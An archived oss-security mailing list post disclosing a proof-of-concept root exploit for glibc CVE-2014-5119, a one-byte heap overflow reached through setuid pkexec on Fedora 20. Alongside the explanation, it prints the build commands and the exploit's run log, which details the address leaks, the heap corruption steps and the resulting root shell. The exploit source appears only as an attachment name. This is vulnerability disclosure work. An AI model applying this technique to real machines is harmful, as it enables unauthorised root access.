'[oss-security] CVE-2014-5119 glibc __gconv_translit_find() exploit'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2014-5119 glibc __gconv_translit_find() exploit
From:       Tavis Ormandy <taviso () google ! com>
Date:       2014-08-26 2:00:15
Message-ID: CAJ_zFk+bKENpjHtgf63Kick8SM_sTo0RWTjo1MVejtTgU5RV4g () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we're publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@localhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

[Attachment #5 (text/html)]

<div dir="ltr">List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte heap \
metadata overflow in the glibc internal routine __gconv_translit_find().<br><br>This is caused \
by the file extension being incorrectly appended to the transliteration module filename. The \
result is one too few bytes are allocated, and a single nul byte is written out of bounds. This \
issue affects real programs, that are typically default installed and setuid root.<br>

<br>Despite explaining that my research suggests this is exploitable, it appears there has been \
general skepticism that single-fixed-byte overflows are still exploitable with modern allocator \
metadata hardening.<br><br>As a result, the issue has been largely dismissed and downgraded in \
severity. As little progress has been made in resolving the issue thus far, we&#39;re \
publishing a proof of concept today. This exploit is specific to Fedora 20 32-bit, but the \
issue is not specific to Fedora, and exploitation on other systems and platforms is \
possible.<br>

<br>This issue is complex, and fiendishly difficult to exploit. Thanks to Chris Evans for his \
heap expertise and insight. Some more information is available on our team blog.<br><br><a \
href="http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html">htt \
p://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html</a><br>

<br>$ make clean<br>rm -f pkexploit pty *.o a.out *.so<br>[taviso@localhost glibc]$ make<br>cc \
-ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl   pkexploit.c    -o \
pkexploit<br>cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl   \
pty.c    -o pty<br>

cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320   -c -o exploit.o \
exploit.c<br>cc exploit.o -fPIC -shared -o exploit.so<br>Execute pkexploit to attempt \
exploitation.<br>[taviso@localhost glibc]$ ./pkexploit <br>

[*] ---------------------------------------------------<br>[*] CVE-2014-5119 glibc \
__gconv_translit_find() exploit<br>[*] ------------------------ taviso &amp; scarybeasts \
-----<br>[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...<br>

[*] Read 7295 bytes of output from pseudo-pty helper, parsing...<br>[*] pseudo-pty helper \
succeeded<br>[*] attempting to parse libc fatal error message...<br>[*] discovered chunk \
pointer from `corrupted double-lin...`, =&gt; 0x507e3658<br>

[*] attempting to parse the libc maps dump...<br>[*] found libc.so mapped @0x40215000<br>[*] \
expecting libc.so bss to begin at 0x406c7000<br>[*] successfully located first morecore chunk \
w/tag @0x407d6000<br>[*] allocating space for argument structure...<br>

[*] creating command string...<br>[*] creating a tls_dtor_list node...<br>[*] open_translit() \
symbol will be at 0x40238320<br>[*] offsetof(struct known_trans, fname) =&gt; 32<br>[*] \
appending `./exploit.so` to list node<br>

[*] building parameter list...<br>[*] anticipating tls_dtor_list to be at 0x406c82d4<br>[*] \
execvpe(pkexec...)...<br>Error accessing /                                                      \
: File name too long<br>

uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) \
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023<br>sh-4.2# exit<br>exit<br></div>

--047d7bf10a1c50843005017eaba8--


["CVE-2014-5119.tar.gz" (application/x-gzip)]

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic